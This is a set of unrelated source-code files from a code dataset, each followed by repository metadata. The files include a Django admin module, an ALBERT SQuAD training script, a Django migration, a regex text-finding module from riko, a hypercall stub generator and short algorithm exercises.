] | permissive | kklimonda/mezzanine-slides | bf360ece7a576af40c9eee9cc3e3c3a586920bb3 | 6eea964c3cea7e7b9cd2e4ea4df87e02904b2bf8 | refs/heads/master | 2021-01-18T13:18:52.982969 | 2014-03-31T12:45:37 | 2014-03-31T12:45:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | from copy import deepcopy
from django.contrib import admin
from django.conf import settings
from mezzanine.pages.models import RichTextPage
from mezzanine.core.admin import TabularDynamicInlineAdmin
from mezzanine.pages.admin import PageAdmin
from mezzanine.forms.admin import FormAdmin
from mezzanine.galleries.admin import GalleryAdmin
# Cartridge is optional: only pull in its shop admin pieces when the shop
# app is installed, and remember the outcome for the registrations below.
if "cartridge.shop" in settings.INSTALLED_APPS:
    from cartridge.shop.models import Category
    from cartridge.shop.admin import CategoryAdmin
    cartridge = True
else:
    cartridge = False
from .models import Slide
"""
We do what we do here instead of simply attaching the inline to PageAdmin,
because more things than just pages inherit from PageAdmin, and injecting the
inline directly into PageAdmin has caused serious problems in the past.
Instead, the inline is injected into each page type individually, in the way
that best suits that type.
"""
class SlideInline(TabularDynamicInlineAdmin):
    """Tabular admin inline for attaching Slide objects to a page type."""
    model = Slide
class RichTextPageAdmin(PageAdmin):
    """PageAdmin subclass for RichTextPage with the slides inline attached."""
    inlines = (SlideInline,)
# Swap the stock RichTextPage admin for the slide-aware subclass.
admin.site.unregister(RichTextPage)
admin.site.register(RichTextPage, RichTextPageAdmin)
# These admins can take the inline by augmenting their tuples in place.
FormAdmin.inlines += (SlideInline,)
GalleryAdmin.inlines += (SlideInline,)
if cartridge:
    # Cartridge shop categories get their own slide-aware admin subclass.
    class CategoryAdminInline(CategoryAdmin):
        inlines = (SlideInline,)
    admin.site.unregister(Category)
    admin.site.register(Category, CategoryAdminInline)
| [
"isaac@bythewood.me"
] | isaac@bythewood.me |
4f639435ccaf5bbdd3a526cbc08cbd897e67d235 | 8968a2696cea58d7b04cb59c2525e89cf6f88a0a | /train_albert_en.py | 975c64c91313071f1de25f3be32ad0b6ee582502 | [] | no_license | Vottivott/swedsquad | a739c7aa938a5db381e2bda9e047c8db93390a90 | 5ed279f166d26b45228501012fbb8817d1c5ae11 | refs/heads/master | 2020-09-26T21:02:36.342548 | 2020-02-09T01:39:38 | 2020-02-09T01:39:38 | 226,342,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | import run_squad_v2_3
# CLI-style arguments handed to run_squad_v2_3.main: fine-tune
# albert-xxlarge-v2 on SQuAD v2.0 (train + eval), then dump the results.
args = """--model_type albert
  --model_name_or_path albert-xxlarge-v2
  --do_train
  --do_eval
  --version_2_with_negative
  --train_file train-v2.0.json
  --predict_file dev-v2.0.json
  --learning_rate 3e-5
  --num_train_epochs 2
  --max_seq_length 384
  --doc_stride 128
  --output_dir albert_en
  --per_gpu_eval_batch_size=3
  --per_gpu_train_batch_size=3
  --overwrite_cache
  --save_steps=10000
  """.split()  # --eval_all_checkpoints
import os
import __main__ as main
print("Script: " + os.path.basename(main.__file__))
print(args)
results = run_squad_v2_3.main(args=args)
# Persist the evaluation results to a timestamped JSON file.
import json
import datetime
date = datetime.datetime.now().strftime("%I.%M.%S.%f %p on %B %d, %Y")
outname = "results " + os.path.basename(main.__file__)[:-3] + " " + date
with open(outname + ".json", "w") as out:
    json.dump(results, out)
print(args)
print("Script: " + os.path.basename(main.__file__)) | [
"hannes.von.essen@gmail.com"
] | hannes.von.essen@gmail.com |
9c282bcc9395d5eda1043828a607d89c7e437cc1 | 2d196f23088be902bc7eba837c1bc7d238d3a4dc | /takmyo_app/migrations/0016_auto_20190701_1939.py | 6b08d6a79f663352837bb158cdd003025f4efcb8 | [] | no_license | SimJunSik/takmyo | 9015bb6359e55b2cc6a3bda6a3b60c3a74c5293e | 719c2953e46be0fd35d18ed61137e54510854234 | refs/heads/master | 2020-05-31T16:07:54.001559 | 2019-07-10T13:22:27 | 2019-07-10T13:22:27 | 190,373,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,519 | py | # Generated by Django 2.1.4 on 2019-07-01 19:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration (see the header comment above).

    Adds the reverse relation from CatsitterReview to Catee and tightens
    the choices/defaults on several Catsitter/form/notification fields.
    Avoid hand-editing field definitions here; regenerate with
    ``makemigrations`` instead.
    """

    dependencies = [
        ('takmyo_app', '0015_auto_20190630_2023'),
    ]

    operations = [
        migrations.AddField(
            model_name='catsitterreview',
            name='catee',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catee_reviews', to='takmyo_app.Catee'),
        ),
        migrations.AlterField(
            model_name='cateetocatsitterform',
            name='place',
            field=models.CharField(choices=[('visit', 'Visit'), ('consignment', 'Consignment')], default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='cateetocatsitterform',
            name='state',
            field=models.CharField(choices=[('unrecognized', 'Unrecognized'), ('progress', 'Progress'), ('recognized', 'Recognized')], default='', max_length=50),
        ),
        migrations.AlterField(
            model_name='catsitter',
            name='available_day',
            field=models.CharField(choices=[('both', 'Both'), ('weekday', 'Weekday'), ('weekend', 'Weekend')], default='', max_length=10),
        ),
        migrations.AlterField(
            model_name='catsitter',
            name='available_place',
            field=models.CharField(choices=[('visit', 'Visit'), ('both', 'Both'), ('consignment', 'Consignment')], default='', max_length=20),
        ),
        migrations.AlterField(
            model_name='catsitter',
            name='available_weekday_time',
            field=models.CharField(choices=[('am', 'Am'), ('both', 'Both'), ('pm', 'Pm')], default='', max_length=10),
        ),
        migrations.AlterField(
            model_name='catsitter',
            name='available_weekend_time',
            field=models.CharField(choices=[('am', 'Am'), ('both', 'Both'), ('pm', 'Pm')], default='', max_length=10),
        ),
        migrations.AlterField(
            model_name='catsitterreview',
            name='catsitter',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='catsitter_reviews', to='takmyo_app.Catsitter'),
        ),
        migrations.AlterField(
            model_name='notification',
            name='category',
            field=models.CharField(choices=[('form', 'Form'), ('review', 'Review')], max_length=30, null=True),
        ),
    ]
| [
"wnstlr24@naver.com"
] | wnstlr24@naver.com |
95faa95eeff801f7dab139c5085f5900338d891f | 41d4f53b7f23639c1e2bbf75f06b77b544b5e8ca | /docs/fragments/feature-engineering-guide-second-feature.py | e70345c620ad6fb8637ac8f6c9d859035d9a1e71 | [
"MIT"
] | permissive | fagan2888/ballet | d010ad5e8158417cd75b73fe67c758e6423cbb35 | 38b156e04e5ae1497e943a8c954606c9a9b5dd83 | refs/heads/master | 2023-03-05T13:41:32.953107 | 2021-02-02T16:58:37 | 2021-02-02T16:58:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from ballet import Feature
from ballet.eng.sklearn import SimpleImputer
# Ballet feature definition: impute missing "Lot Frontage" values with the
# column mean.  The names `input`/`transformer`/`name` are the identifiers
# ballet's feature convention expects (`input` intentionally shadows the
# builtin here).
input = ["Lot Frontage"]
transformer = SimpleImputer(strategy="mean")
name = "Imputed Lot Frontage"
feature = Feature(input=input, transformer=transformer, name=name)
| [
"micahjsmith@gmail.com"
] | micahjsmith@gmail.com |
a8afe8fe90cb44885e1a8de0926880ca20e883b6 | 36957a9ce540846d08f151b6a2c2d582cff1df47 | /VR/Python/Python36/Lib/site-packages/django/contrib/messages/storage/fallback.py | d1e59e7381a074e84dc617160fe1188be756bcf0 | [] | no_license | aqp1234/gitVR | 60fc952307ef413e396d31e0d136faffe087ed2b | e70bd82c451943c2966b8ad1bee620a0ee1080d2 | refs/heads/master | 2022-12-29T15:30:12.540947 | 2020-10-07T15:26:32 | 2020-10-07T15:26:32 | 290,163,043 | 0 | 1 | null | 2020-08-25T09:15:40 | 2020-08-25T08:47:36 | C# | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:21bcb2660f1c4d4fb5f5979183a2e774b7d12b44a87af0f0a8ab6bab3855a7a7
size 2095
| [
"aqp1234@naver.com"
] | aqp1234@naver.com |
511ea27f7502976ed688dd2cdd273ad0cfd53fbe | e815fd9fbc703ce43d94fba6e53c86b898e32977 | /llia/synths/controlmixer/controlmixer_proxy.py | 33161f517185689a07627bddbc820d2b9f087313 | [] | no_license | kaos/Llia | 0cdedc13d84ce86034287fba00ec0b169fbd87b1 | b2aaa163c4ada3b446a7c3701e3f05c0f8406d6e | refs/heads/master | 2020-12-28T19:23:48.480608 | 2017-03-27T05:51:14 | 2017-03-27T05:51:14 | 64,940,263 | 0 | 0 | null | 2016-08-04T14:13:13 | 2016-08-04T14:13:13 | null | UTF-8 | Python | false | false | 1,651 | py | # llia.synths.controlmixer.ghost_proxy
from __future__ import print_function
import llia.constants
from llia.gui.pallet import default_pallet, Pallet
from llia.synth_proxy import SynthSpecs, SynthProxy
from llia.synths.controlmixer.controlmixer_data import program_bank, pp
specs = SynthSpecs("ControlMixer")


class ControlmixerProxy(SynthProxy):
    """Llia synth proxy for the ControlMixer controller/effect."""

    def __init__(self, app):
        super(ControlmixerProxy, self).__init__(app, specs, program_bank)
        self.app = app

    def create_subeditors(self):
        """Attach the GUI sub-editor when a supported toolkit is configured."""
        toolkit = self.app.config["gui"].upper()
        if toolkit != "TK":
            return
        # Imported lazily so non-Tk configurations never load Tk code.
        from llia.synths.controlmixer.tk.editor import create_editor
        main_win = self.app.main_window()
        create_editor(main_win[self.sid])
# Colour pallet: start from the default and override the slider colours.
controlmixer_pallet = Pallet(default_pallet)
controlmixer_pallet["SLIDER-TROUGH"] = "#432703"
controlmixer_pallet["SLIDER-OUTLINE"] = "#42033E"

# Populate the SynthSpecs entry for ControlMixer.
specs["constructor"] = ControlmixerProxy
specs["description"] = "Combines up to 4 control signals"
specs["keymodes"] = ("EFX", )
specs["pretty-printer"] = pp
#specs["program-generator"] =
specs["is-efx"] = True
specs["is-controller"] = True
specs["help"] = "Controlmixer"
specs["pallet"] = controlmixer_pallet
# Four control inputs (A-D), all defaulting to the null sink bus.
specs["control-input-buses"] = [["inbusA","null_sink"],
                                ["inbusB","null_sink"],
                                ["inbusC","null_sink"],
                                ["inbusD","null_sink"]]
specs["control-output-buses"] = [["outbus","null_source"]]
print("\t%s" % specs["format"])
# Register this synth as a controller type with the global constants table.
llia.constants.CONTROLLER_SYNTH_TYPES.append(specs["format"])
| [
"plewto@gmail.com"
] | plewto@gmail.com |
d87e6b7190ffd9f4f1c99b2383a7d2ac3e2c9173 | f36f17f00d02198c851a4fcc7680aa4a3fa2397e | /riko/modules/refind.py | d20944d580c5018a127c1e4cef366804efff1063 | [
"MIT"
] | permissive | HKCaesar/riko | c0a9fe597e137b2512c12e6444c8b4645eaf1b63 | 2ad4cb372a784dca4fbce68d71171bd8e6a0e8ae | refs/heads/master | 2020-06-17T16:35:46.594452 | 2017-05-22T17:59:39 | 2017-05-22T17:59:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,711 | py | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
riko.modules.refind
~~~~~~~~~~~~~~~~~~~
Provides functions for finding text located before, after, at, or between
substrings using regular expressions, a powerful type of pattern matching.
Examples:
basic usage::
>>> from riko.modules.refind import pipe
>>> conf = {'rule': {'find': '[aiou]'}}
>>> item = {'content': 'hello world'}
>>> next(pipe(item, conf=conf))['refind'] == 'hell'
True
Attributes:
OPTS (dict): The default pipe options
DEFAULTS (dict): The default parser options
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import re
import pygogo as gogo
from functools import reduce
from builtins import *
from . import processor
from riko.bado import coroutine, return_value, itertools as ait
# Default pipe options: treat the item field as text, default to the
# 'content' field, and normalize the 'rule' sub-config to a list of rules.
OPTS = {
    'listize': True, 'ftype': 'text', 'field': 'content', 'extract': 'rule'}

# No extra parser defaults beyond OPTS.
DEFAULTS = {}

# Module-level logger.
logger = gogo.Gogo(__name__, monolog=True).logger
PARAMS = {
'first': lambda word, rule: re.split(rule.find, word, maxsplit=1),
'last': lambda word, rule: re.split(rule.find, word)}
AT_PARAMS = {
'first': lambda word, rule: re.search(rule.find, word),
'last': lambda word, rule: re.findall(rule.find, word)}
OPS = {
'before': lambda splits, rule: rule.find.join(splits[:len(splits) - 1]),
'after': lambda splits, rule: splits[-1],
'at': lambda splits, rule: splits,
}
def reducer(word, rule):
param = rule.param or 'first'
default = rule.default or ''
if rule.location == 'at':
result = AT_PARAMS.get(param, AT_PARAMS['first'])(word, rule)
if result and param == 'first':
splits = result.group(0)
elif result and param == 'last':
splits = result[-1]
else:
splits = default
else:
splits = PARAMS.get(param, PARAMS['first'])(word, rule)
return OPS.get(rule.location, OPS['before'])(splits, rule).strip()
@coroutine
def async_parser(word, rules, skip=False, **kwargs):
    """Asynchronously apply every rule to `word` in sequence.

    Args:
        word (str): The string to transform
        rules (List[obj]): the parsed rules (Objectify instances).
        skip (bool): Don't parse the content
        kwargs (dict): Keyword arguments

    Kwargs:
        assign (str): Attribute to assign parsed content (default: refind)
        stream (dict): The original item

    Returns:
        Deferred: twisted.internet.defer.Deferred item
    """
    # When skipping, hand back the untouched stream immediately.
    if skip:
        return_value(kwargs['stream'])

    # Otherwise fold the rules over the word cooperatively.
    reduced = yield ait.coop_reduce(reducer, rules, word)
    return_value(reduced)
def parser(word, rules, skip=False, **kwargs):
    """Apply every rule to `word` in sequence.

    Args:
        word (str): The string to transform
        rules (List[obj]): the parsed rules (Objectify instances).
        skip (bool): Don't parse the content
        kwargs (dict): Keyword arguments

    Kwargs:
        assign (str): Attribute to assign parsed content (default: refind)
        stream (dict): The original item

    Returns:
        dict: The item (when skipping) or the transformed text
    """
    if skip:
        return kwargs['stream']
    return reduce(reducer, rules, word)
@processor(DEFAULTS, isasync=True, **OPTS)
def async_pipe(*args, **kwargs):
    """A processor module that asynchronously finds text within the field of an
    item using regex.

    Args:
        item (dict): The entry to process
        kwargs (dict): The keyword arguments passed to the wrapper

    Kwargs:
        conf (dict): The pipe configuration. Must contain the key 'rule'.

            rule (dict): can be either a dict or list of dicts. Must contain
                the key 'find'. May contain the keys 'location' or 'param'.

                find (str): The string to find.

                location (str): Direction of the substring to return. Must be
                    either 'before', 'after', or 'at' (default: 'before').

                param (str): The type of replacement. Must be either 'first'
                    or 'last' (default: 'first').

        assign (str): Attribute to assign parsed content (default: refind)
        field (str): Item attribute to operate on (default: 'content')

    Returns:
        Deferred: twisted.internet.defer.Deferred item with transformed content

    Examples:
        >>> from riko.bado import react
        >>> from riko.bado.mock import FakeReactor
        >>>
        >>> def run(reactor):
        ...     callback = lambda x: print(next(x)['refind'])
        ...     conf = {'rule': {'find': '[aiou]'}}
        ...     d = async_pipe({'content': 'hello world'}, conf=conf)
        ...     return d.addCallbacks(callback, logger.error)
        >>>
        >>> try:
        ...     react(run, _reactor=FakeReactor())
        ... except SystemExit:
        ...     pass
        ...
        hell
    """
    # All work happens in async_parser(); the @processor decorator handles
    # field extraction, rule parsing and result assignment.
    return async_parser(*args, **kwargs)
@processor(**OPTS)
def pipe(*args, **kwargs):
    """A processor that finds text within the field of an item using regex.

    Args:
        item (dict): The entry to process
        kwargs (dict): The keyword arguments passed to the wrapper

    Kwargs:
        conf (dict): The pipe configuration. Must contain the key 'rule'.

            rule (dict): can be either a dict or list of dicts. Must contain
                the key 'find'. May contain the keys 'location' or 'param'.

                find (str): The string to find.

                location (str): Direction of the substring to return. Must be
                    either 'before', 'after', or 'at' (default: 'before').

                param (str): The type of replacement. Must be either 'first'
                    or 'last' (default: 'first').

        assign (str): Attribute to assign parsed content (default: refind)
        field (str): Item attribute to operate on (default: 'content')

    Yields:
        dict: an item with transformed content

    Examples:
        >>> conf = {'rule': {'find': '[aiou]'}}
        >>> item = {'content': 'hello world'}
        >>> next(pipe(item, conf=conf))['refind'] == 'hell'
        True
        >>> conf = {'rule': {'find': 'w', 'location': 'after'}}
        >>> kwargs = {'conf': conf, 'field': 'title', 'assign': 'result'}
        >>> item = {'title': 'hello world'}
        >>> next(pipe(item, **kwargs))['result'] == 'orld'
        True
        >>> conf = {
        ...     'rule': [
        ...         {'find': 'o([a-z])', 'location': 'after'}, {'find': 'd'}]}
        >>> item = {'content': 'hello world'}
        >>> next(pipe(item, conf=conf))['refind'] == 'l'
        True
    """
    # All work happens in parser(); the @processor decorator handles field
    # extraction, rule parsing and result assignment.
    return parser(*args, **kwargs)
| [
"reubano@gmail.com"
] | reubano@gmail.com |
2c3e86903090f4e9df6b6db7b7638629a05d5502 | be4d32d35fd4af3cf4ecf3736c8e879d50b8ae37 | /Python/Django/belt2_exam/belt2_exam/wsgi.py | 35143390e13c3eca0342994133978c7b178f5e20 | [] | no_license | yangluo0901/CodingDojo_Assignment | f09bbec26f87b5b276fd6ef3c77f27d13518937e | 44ccb5158b12c1656793bac76f1a7a707b147982 | refs/heads/master | 2021-10-11T21:12:14.889189 | 2019-01-29T19:52:56 | 2019-01-29T19:52:56 | 105,716,841 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | """
WSGI config for belt2_exam project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "belt2_exam.settings")
application = get_wsgi_application()
| [
"yangluo0901@gmail.com"
] | yangluo0901@gmail.com |
ef2d337b974ef2e91f0a09d2fb51bc1e027a2c04 | 361b96b81858a0f620da36ec20da0ec22fc84fec | /hypercallgen.py | 32b30daa878fe82428cbc87da17c6bb939b0f0ef | [
"BSD-2-Clause"
] | permissive | daeken/Zookeeper | 88738beaa2eb8870d746981469b5e76df6266534 | b27f4bd17af1f5e1c7bbdd4a18017458822de648 | refs/heads/master | 2021-01-17T20:06:27.984878 | 2016-06-04T22:50:30 | 2016-06-04T22:50:30 | 37,281,709 | 37 | 2 | null | 2016-05-20T15:48:30 | 2015-06-11T19:31:08 | C++ | UTF-8 | Python | false | false | 3,977 | py | from yaml import load
# Load the hypercall declarations (name -> argument list) from YAML.
# NOTE(review): Python-2-only `file()` builtin, and yaml.load without an
# explicit Loader; acceptable for a trusted local build script.
calls = load(file('hypercalls.yaml'))

# Guest-side implementation file (vmcall stubs).
nhc = file('NightBeliever/Hypercall.cpp', 'w')
print >>nhc, '// Automatically generated by hypercallgen.py'
print >>nhc, '#include "NightBeliever.hpp"'
print >>nhc, '#include "../Hypercalls.hpp"'
print >>nhc

# Guest-side declarations header.
nhh = file('NightBeliever/Hypercall.hpp', 'w')
print >>nhh, '// Automatically generated by hypercallgen.py'
print >>nhh, '#pragma once'
print >>nhh, '#include "NightBeliever.hpp"'
print >>nhh, '#include "HypercallSupport.hpp"'
print >>nhh

# Host-side dispatcher: open the switch over hypercall numbers; the per-call
# cases are emitted by the generation loop below.
zhc = file('HypercallDispatch.cpp', 'w')
print >>zhc, '// Automatically generated by hypercallgen.py'
print >>zhc, '#include "Zookeeper.hpp"'
print >>zhc
print >>zhc, 'void hypercall_dispatch(uint32_t call, uint32_t addr) {'
print >>zhc, '\tswitch(call) {'

# Shared argument-struct definitions (used by both guest and host).
zhh = file('Hypercalls.hpp', 'w')
print >>zhh, '// Automatically generated by hypercallgen.py'
print >>zhh, '#pragma once'
print >>zhh

# Host-side Hypercall class declaration; methods are appended per call.
zhl = file('Hypercall.hpp', 'w')
print >>zhl, '// Automatically generated by hypercallgen.py'
print >>zhl, '#pragma once'
print >>zhl, '#include "Zookeeper.hpp"'
print >>zhl, '#include "Hypercalls.hpp"'
print >>zhl
print >>zhl, 'void hypercall_dispatch(uint32_t call, uint32_t addr);'
print >>zhl
print >>zhl, 'class Hypercall {'
print >>zhl, 'public:'
def typemap(type):
    """Map a C declaration type to its 32-bit hypercall ABI representation.

    Pointers and thread entry points cross the hypercall boundary as raw
    32-bit guest addresses; every other type passes through unchanged.
    """
    is_pointer_like = '*' in type or type == 'thread_ep_t'
    return 'uint32_t' if is_pointer_like else type
def cast(a, b):
    """Return a C cast prefix '(b) ' when types differ, else ''."""
    return '' if a == b else '(%s) ' % b
# Emit one dispatcher case, one guest stub and one host declaration per
# hypercall. The call number is the enumeration index `i`.
for i, (name, args) in enumerate(calls.items()):
    args = args if args is not None else []
    ret = ''
    nret = ''
    rettype = 'void'
    # An optional leading {'return': <type>} entry declares the return type.
    if args and 'return' in args[0]:
        rettype = args[0]['return']
        ret = 'auto ret = %s' % (cast(typemap(rettype), 'uint32_t'))
        nret = 'return %s' % (cast('uint32_t', rettype))
        del args[0]
    # Flatten to (arg_name, declared_type, abi_type) triples.
    args = [(an, at, typemap(at)) for x in args for (an, at) in x.items()]
    print >>zhc, '\t\tcase %i: { // %s' % (i, name)
    if len(args) > 1:
        # Multiple arguments travel in a packed struct whose guest address
        # is passed as the vmcall operand.
        print >>zhh, 'typedef struct __attribute__((packed)) hypercall_%s {' % name
        for arg, type, mapped in args:
            print >>zhh, '\t%s %s;' % (mapped, arg)
        print >>zhh, '} hypercall_%s_t;' % name
        print >>zhh
        print >>zhc, '\t\t\tauto sarg = box->cpu->read_memory<hypercall_%s_t>(addr);' % (name)
        print >>zhc, '\t\t\t%sbox->hypercall->%s(%s);' % (ret, name, ', '.join('sarg.' + arg for arg, _, _ in args))
        if rettype != 'void':
            print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
        print >>zhl, '\t%s %s(%s);' % (typemap(rettype), name, ', '.join('%s %s' % (mapped, name) for name, _, mapped in args))
        print >>nhh, '%s %s(%s);' % (rettype, name, ', '.join(type for _, type, _ in args))
        print >>nhc, '%s %s(%s) {' % (rettype, name, ', '.join('%s %s' % (type, name) for name, type, _ in args))
        print >>nhc, '\tvolatile hypercall_%s_t _sarg;' % name
        for arg, type, mapped in args:
            print >>nhc, '\t_sarg.%s = %s%s;' % (arg, cast(type, mapped), arg)
        print >>nhc, '\t%svmcall(%i, (uint32_t) &_sarg);' % (nret, i)
        print >>nhc, '}'
        print >>nhc
    elif len(args) == 1:
        # A single argument is passed directly as the vmcall operand.
        print >>zhc, '\t\t\t%sbox->hypercall->%s(%saddr);' % (ret, name, cast('uint32_t', args[0][2]))
        if rettype != 'void':
            print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
        print >>zhl, '\t%s %s(%s %s);' % (typemap(rettype), name, args[0][2], args[0][0])
        print >>nhh, '%s %s(%s);' % (rettype, name, args[0][1])
        print >>nhc, '%s %s(%s arg) {' % (rettype, name, args[0][1])
        print >>nhc, '\t%svmcall(%i, %sarg);' % (nret, i, cast(args[0][1], 'uint32_t'))
        print >>nhc, '}'
        print >>nhc
    else:
        # No arguments: the operand slot is unused (NULL).
        print >>zhc, '\t\t\t%sbox->hypercall->%s();' % (ret, name)
        if rettype != 'void':
            print >>zhc, '\t\t\tbox->cpu->hv->reg(EAX, ret);'
        print >>zhl, '\t%s %s();' % (typemap(rettype), name)
        print >>nhh, '%s %s();' % (rettype, name)
        print >>nhc, '%s %s() {' % (rettype, name)
        print >>nhc, '\t%svmcall(%i, NULL);' % (nret, i)
        print >>nhc, '}'
        print >>nhc
    print >>zhc, '\t\t\tbreak;'
    print >>zhc, '\t\t}'

# Close the dispatcher switch/function and the Hypercall class declaration.
print >>zhc, '\t}'
print >>zhc, '}'
print >>zhc

print >>zhl, '};'
print >>zhl
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
ad385490ca92fa12443faef3fbd626e74dcad0cb | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /SFAjxGWk9AbfwbXFN_9.py | ec4e643e07b51a271e0aff50e66352e44bf41ae3 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | """
Create a function that will find all primes below a given number. Return the
result as a list.
### Examples
primes_below_num(5) ➞ [2, 3, 5]
primes_below_num(10) ➞ [2, 3, 5, 7]
primes_below_num(20) ➞ [2, 3, 5, 7, 11, 13, 17, 19]
### Notes
If `n` is a prime, it is included in the list.
"""
def is_prime(num):
    """Return True if `num` is prime.

    Fixes the original trial-division check, which ran an empty loop for
    num < 2 and therefore wrongly reported 0, 1 and negatives as prime.
    """
    if num < 2:
        return False
    # Only divisors up to sqrt(num) need to be tested.
    for i in range(2, int(num ** 0.5) + 1):
        if num % i == 0:
            return False
    return True


def primes_below_num(n):
    """Return all primes p with 2 <= p <= n (n itself included if prime)."""
    return [num for num in range(2, n + 1) if is_prime(num)]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
5c85dad1f51e149d019abbd4bd4632e8fb570871 | 4a73648ecd3951b802e89e83a3bd9ef5b063af3d | /python_part/Leetcode/Data Structure/BinaryTree/easy/100. Same Tree/Solution.py | c61f1ad568845f63c4619fd72896ce1389db1f89 | [] | no_license | Allen-C-Guan/Leetcode-Answer | f5f9ee1348b86da914a564b7d23bf8904d5aa27f | f6e1374ef567590fee15ba6d1d6d65891233b5e1 | refs/heads/master | 2023-08-17T18:18:00.581743 | 2021-10-10T15:24:07 | 2021-10-10T15:24:07 | 257,017,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Definition for a binary tree node.
class TreeNode:
    """Plain binary-tree node."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


# Recursion mindset: assume the recursive calls have already solved the
# subproblems (the subtrees); only decide how to combine their answers at
# the current node. The base cases are the only places where the answer is
# computed directly.

class Solution:
    def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:
        """Return True when the trees rooted at p and q are identical."""
        # Both subtrees exhausted together: identical so far.
        if p is None and q is None:
            return True
        # Exactly one side ended early: shapes differ.
        if p is None or q is None:
            return False
        # Both present: values must match and both subtrees must match.
        return (p.val == q.val
                and self.isSameTree(p.left, q.left)
                and self.isSameTree(p.right, q.right))
| [
"54201792+Allen-C-Guan@users.noreply.github.com"
] | 54201792+Allen-C-Guan@users.noreply.github.com |
d5aec38822b3b128eeaf56abe575341e4218020a | 5917a63a6d16de893f54e86a70f5d881648112c1 | /Py1_spc-master/Lec13/main3.py | 6b43b167c5bbb78d74f14b4340ee7242ebe54db7 | [] | no_license | litded/lessons | f14e8e68577d417fc87eaca1c426f535baa04e8b | af2e0f6cae61878a833a7eebd7c2509d930ede48 | refs/heads/master | 2023-08-22T00:49:50.362770 | 2021-10-16T20:33:01 | 2021-10-16T20:33:01 | 417,940,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | """
Возвращаемые значения. Часть 2.
"""
def get_name():
    """Return a hard-coded example name."""
    return "Alice"
def get_void():
    """Demonstrate that a function with no return value yields None."""
    print("This function without RETURN!")
    # A function that never executes `return <value>` returns None by
    # default; a bare `return` is just syntactic sugar for `return None`.
    return
if get_void() is None:
    # Check the implicit None result
    print()

ans1 = get_name()
print("From get_name():", ans1)
ans2 = get_void()
print("From get_void():", ans2)

# Java equivalent of a value-less function, for comparison:
# """
# In Java
# """
# void MyFunc(){
# }
"i.ivlev@westwing.ru"
] | i.ivlev@westwing.ru |
9fa5d51a54777a623a4635f83371d802bf01eef2 | 73189d4d0b39efe5864d25aff07d8338ab8f3110 | /build/geometry2-melodic-devel/tf2_ros/catkin_generated/pkg.develspace.context.pc.py | 61eafca3339558f2801d2b75f77e862900bdfb75 | [] | no_license | jungwoohan72/Multi_Robot_Search_And_Rescue | a64590a0f899682c2429400c5cb6d4d8a7d7fd99 | 3e70f9e9b895a96e045f19a05780b091c16f2e60 | refs/heads/main | 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated catkin package context; values are baked in at build time.
CATKIN_PACKAGE_PREFIX = ""
# Exported include directories (empty source string yields an empty list).
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/morin-sol/ME652/src/geometry2-melodic-devel/tf2_ros/include".split(';') if "/home/morin-sol/ME652/src/geometry2-melodic-devel/tf2_ros/include" != "" else []
# Catkin run dependencies, space-separated for pkg-config consumption.
PROJECT_CATKIN_DEPENDS = "actionlib;actionlib_msgs;geometry_msgs;message_filters;roscpp;rosgraph;tf2;tf2_msgs;tf2_py".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ltf2_ros".split(';') if "-ltf2_ros" != "" else []
PROJECT_NAME = "tf2_ros"
PROJECT_SPACE_DIR = "/home/morin-sol/ME652/devel"
PROJECT_VERSION = "0.6.7"
| [
"dream4future@kaist.ac.kr"
] | dream4future@kaist.ac.kr |
0e163fba7e7b98551f709ab3c3c7d44014488322 | 26d6c34df00a229dc85ad7326de6cb5672be7acc | /msgraph-cli-extensions/beta/usersactions_beta/azext_usersactions_beta/vendored_sdks/usersactions/operations/_users_outlook_task_groups_task_folders_tasks_operations.py | 3fd9123f0a63d2df59395ed32b06612e15190636 | [
"MIT"
] | permissive | BrianTJackett/msgraph-cli | 87f92471f68f85e44872939d876b9ff5f0ae6b2c | 78a4b1c73a23b85c070fed2fbca93758733f620e | refs/heads/main | 2023-06-23T21:31:53.306655 | 2021-07-09T07:58:56 | 2021-07-09T07:58:56 | 386,993,555 | 0 | 0 | NOASSERTION | 2021-07-17T16:56:05 | 2021-07-17T16:56:05 | null | UTF-8 | Python | false | false | 5,104 | py | # coding=utf-8
